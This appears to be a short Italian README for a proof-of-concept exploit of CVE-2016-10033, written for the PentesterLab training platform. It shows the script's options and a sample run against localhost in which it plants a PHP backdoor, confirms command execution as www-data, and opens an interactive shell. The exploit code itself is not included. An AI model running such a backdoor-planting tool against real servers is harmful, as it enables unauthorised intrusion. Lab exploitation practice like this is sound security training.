
Una PoC della CVE-2016-10033 che ho realizzato per PentesterLab.
L'ho scritto per PentesterLab
Se vieni da PentesterLab, non barare, è molto meglio imparare.
Spero sia utile a qualcuno, se non a me in futuro :)
Ha una shell interattiva e anche un bel po' di roba argparse.
usage: poc.py [-h] [--target TARGET] [--backdoor BACKDOOR] [--proxy] [--raw] [--no-color]
options:
-h, --help show this help message and exit
--target TARGET Target URL
--backdoor BACKDOOR Backdoor path
--proxy Use local proxy
--raw Show raw output
--no-color Disable colored output
$ python3 poc.py --target http://localhost:8000 --proxy
[+] Using random backdoor name: caxvcs009f.php
[+] Sending exploit to target...
[+] Testing backdoor...
[+] Backdoor working! Test output: uid=33(www-data) gid=33(www-data) groups=33(www-data)
[+] Starting interactive shell...
[+] Type "exit" to quit
--------------------------------------------------
shell> whoami
www-data